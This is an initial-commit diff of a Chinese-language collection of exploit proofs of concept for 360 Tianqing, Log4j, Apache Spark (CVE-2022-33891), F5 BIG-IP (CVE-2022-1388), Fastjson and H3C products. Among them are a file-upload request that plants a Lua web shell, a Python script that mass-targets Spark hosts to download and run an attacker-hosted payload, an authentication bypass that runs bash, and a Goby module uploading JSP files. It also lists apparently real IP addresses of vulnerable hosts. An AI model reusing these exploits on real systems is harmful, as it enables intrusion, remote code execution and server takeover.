INITIAL COMMIT

360 天擎任意文件上传.md

@@ -0,0 +1,30 @@
+## 360 天擎任意文件上传
+
+```
+漏洞等级：严重
+影响范围：未知，应该是个0day
+漏洞详情：/api/client_upload_file.json 存在任意文件上传漏洞
+```
+
+> 参考POC
+```
+POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
+78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
+Host: 192.168.11.210
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
+(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 323
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
+Q
+Referer: http://192.168.11.210
+Accept-Encoding: gzip
+------WebKitFormBoundaryLx7ATxHThfk91oxQ
+Content-Disposition: form-data; name="file"; filename="flash.php"
+Content-Type: application/xxxx
+if ngx.req.get_uri_args().cmd then
+cmd = ngx.req.get_uri_args().cmd
+local t = io.popen(cmd)
+local a = t:read("*all")
+ngx.say(a)
+end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
+```

Apache Log4j2 RCE.md

@@ -0,0 +1,5 @@
+## Apache Log4j 2 远程代码执行
+
+```
+(){:;}{$:;$}{jndi:rmi${{::-:}}}//dnslog/test
+```

Apache Spark UI 命令注入漏洞 [CVE-2022-33891].md

@@ -0,0 +1,42 @@
+## Apache Spark UI 命令注入漏洞 [CVE-2022-33891]
+
+> https://github.com/west-wind/CVE-2022-33891
+```
+import requests, ConfigParser, csv, requests, urllib3, time
+import pandas as pd
+ua = 'https://github.com/west-wind/cve-2022-33891'
+
+config = ConfigParser.ConfigParser()
+config.readfp(open(r'POC.conf'))
+yourHost = config.get('PAYLOAD', 'yourHostHere')
+yourPayload = config.get('PAYLOAD', 'yourPayloadHere')
+
+def usage():
+  print "\nWARNING: This script is inteded to be used for vulnerability testing purposes only. Ensure you're authorised to run your payload on the target prior to using this script!"
+  print "\nExit now, if you are not authorised."
+  print "\nThis POC expects to receive all targets in a CSV file --> allTargets.csv with one column titled --> targets, ex., http://12.23.45.67:9099 or http://spark.domain.com"
+  print "The / will be added by the script."
+  print "\nEnter the payload to be executed on the target in the POC.conf file. "
+  print "Your host in    --> yourHostHere 'http://my_domain_here.com'"
+  print "Your payload in --> yourPayloadHere 'payload.sh'\n\n\n"
+  time.sleep(5)
+
+def CVE_2022_33891(target):
+  global yourPayload, yourHost, ua
+  try:
+    url = target + '/?doAs=`wget ' + yourHost + '/' + yourPayload + ' && chmod 755 ' + yourPayload + ' | bash`'
+    header = {'User-Agent': ua}
+    response = requests.get(url, headers=header, verify=False)
+    print "\n[+] URL: ",url,"\n[+] HTTP Status: ",response.status_code,"\n[+] HTTP Text: ",response.text
+  except Exception as pocEx:
+    print "\n[!] Exception occured: ",pocEx, url
+
+usage()
+try:
+  df = pd.read_csv('allTargets.csv')
+  column1 = df.targets
+  for target in column1:
+    CVE_2022_33891(target)
+except Exception as mainEx:
+  print "\nException occured in main: ",mainEx
+```

F5 BIG-IP RCE exploitation (CVE-2022-1388).md

@@ -0,0 +1,15 @@
+## F5 BIG-IP RCE EXP [ CVE-2022-1388 ]
+
+```
+POST /mgmt/tm/util/bash HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
+Content-type: application/json
+X-F5-Auth-Token: anything
+Authorization: Basic YWRtaW46
+Content-Length: 42
+
+{"command": "run", "utilCmdArgs": "-c id"}
+```

Fastjson代码执行漏洞 [CVE-2022-25845].md

@@ -0,0 +1,10 @@
+## Fastjson代码执行漏洞(CVE-2022-25845)
+
+> Fastjson <= 1.2.80
+```
+{
+  "@type": "java.lang.Exception",
+  "@type": "com.github.isafeblue.fastjson.SimpleException",
+  "domain": "calc"
+}
+```

H3C CVM 前台任意文件上传漏洞.md

@@ -0,0 +1,236 @@
+## H3C CVM 前台任意文件上传漏洞
+
+```go
+package exploits
+
+import (
+  "git.gobies.org/goby/goscanner/goutils"
+  "git.gobies.org/goby/goscanner/jsonvul"
+  "git.gobies.org/goby/goscanner/scanconfig"
+  "git.gobies.org/goby/httpclient"
+  "strings"
+)
+
+func init() {
+  expJson := `{
+      "Name": "H3C CVM Arbitrary File Upload Vulnerability",
+      "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
+      "Product": "H3C-CVM",
+  "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
+  "DisclosureDate": "2022-05-25",
+  "Author": "[email protected]",
+  "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
+  "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
+  "Level": "3",
+      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
+      "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
+  "References": [
+    "https://fofa.so/"
+  ],
+  "Is0day": false,
+  "HasExp": true,
+  "ExpParams": [
+    {
+      "name": "fileName",
+      "type": "input",
+      "value": "evil",
+      "show": ""
+    },
+    {
+      "name": "fileContent",
+      "type": "input",
+      "value": "<%out.println(\"123\");%>",
+      "show": ""
+    }
+  ],
+  "ExpTips": {
+    "Type": "",
+    "Content": ""
+  },
+  "ScanSteps": [
+    "AND",
+    {
+      "Request": {
+        "method": "GET",
+        "uri": "/test.php",
+        "follow_redirect": true,
+        "header": {},
+        "data_type": "text",
+        "data": ""
+      },
+      "ResponseTest": {
+        "type": "group",
+        "operation": "AND",
+        "checks": [
+          {
+            "type": "item",
+            "variable": "$code",
+            "operation": "==",
+            "value": "200",
+            "bz": ""
+          },
+          {
+            "type": "item",
+            "variable": "$body",
+            "operation": "contains",
+            "value": "test",
+            "bz": ""
+          }
+        ]
+      },
+      "SetVariable": []
+    }
+  ],
+  "ExploitSteps": [
+    "AND",
+    {
+      "Request": {
+        "method": "GET",
+        "uri": "/test.php",
+        "follow_redirect": true,
+        "header": {},
+        "data_type": "text",
+        "data": ""
+      },
+      "ResponseTest": {
+        "type": "group",
+        "operation": "AND",
+        "checks": [
+          {
+            "type": "item",
+            "variable": "$code",
+            "operation": "==",
+            "value": "200",
+            "bz": ""
+          },
+          {
+            "type": "item",
+            "variable": "$body",
+            "operation": "contains",
+            "value": "test",
+            "bz": ""
+          }
+        ]
+      },
+      "SetVariable": []
+    }
+  ],
+  "Tags": [
+    "Arbitrary File Creation"
+  ],
+  "VulType": [
+    "Arbitrary File Creation"
+  ],
+  "CVEIDs": [
+    ""
+  ],
+  "CNNVD": [
+    ""
+  ],
+  "CNVD": [
+    ""
+  ],
+  "CVSSScore": "8.0",
+  "Translation": {
+    "CN": {
+      "Name": "H3C CVM 前台任意文件上传漏洞",
+      "Product": "H3C-CVM",
+      "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势， 以及深入人心的以客户为中心的理念， 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制， 以 简洁的管理界面， 统一管理数据中心内所有的物理资源和虚拟资源， 不仅能提高管理员的管控能力、 简化日常例行工作， 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</span><br></p>",
+      "Recommendation": "<p>目前官方尚未发布安全补丁，请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
+      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。</span><br></p>",
+      "VulType": [
+        "⽂件上传"
+      ],
+      "Tags": [
+        "⽂件上传"
+      ]
+    },
+    "EN": {
+      "Name": "H3C CVM Arbitrary File Upload Vulnerability",
+      "Product": "H3C-CVM",
+      "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
+      "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
+      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
+      "VulType": [
+        "Arbitrary File Creation"
+      ],
+      "Tags": [
+        "Arbitrary File Creation"
+      ]
+    }
+  },
+  "AttackSurfaces": {
+    "Application": null,
+    "Support": null,
+    "Service": null,
+    "System": null,
+    "Hardware": null
+  }
+}`
+
+  exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
+
+    // 上传文件
+    requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
+    requestConfig.VerifyTls = false
+    requestConfig.FollowRedirect = false
+    requestConfig.Header.Store("Content-range", "bytes 0-10/20")
+    requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
+    requestConfig.Data = fileContent
+
+    if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
+      if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") {
+        return true
+      }
+    }
+
+    return false
+  }
+
+  checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
+
+    requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
+    requestConfig.VerifyTls = false
+    requestConfig.FollowRedirect = false
+
+    if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
+      return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
+    }
+
+    return false
+  }
+
+  ExpManager.AddExploit(NewExploit(
+    goutils.GetFileName(),
+    expJson,
+    func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+
+      rand := goutils.RandomHexString(6)
+      rand2 := goutils.RandomHexString(6)
+
+      if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) {
+        return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
+      }
+
+      return false
+    },
+    func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+
+      fileContent := ss.Params["fileContent"].(string)
+      fileName := ss.Params["fileName"].(string)
+
+      if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
+
+        expResult.Success = true
+        expResult.Output = "文件上传已成功，请检查路径：/cas/js/lib/buttons/" + fileName + ".jsp"
+      }
+
+      return expResult
+    },
+  ))
+}
+
+// http://183.63.173.141:8080/
+// https://60.190.202.42:8443/
+// http://61.53.232.5:28080/
+```

H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md

@@ -0,0 +1,5 @@
+## H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
+
+```
+/userLogin.asp/actionpolicy_status/
+```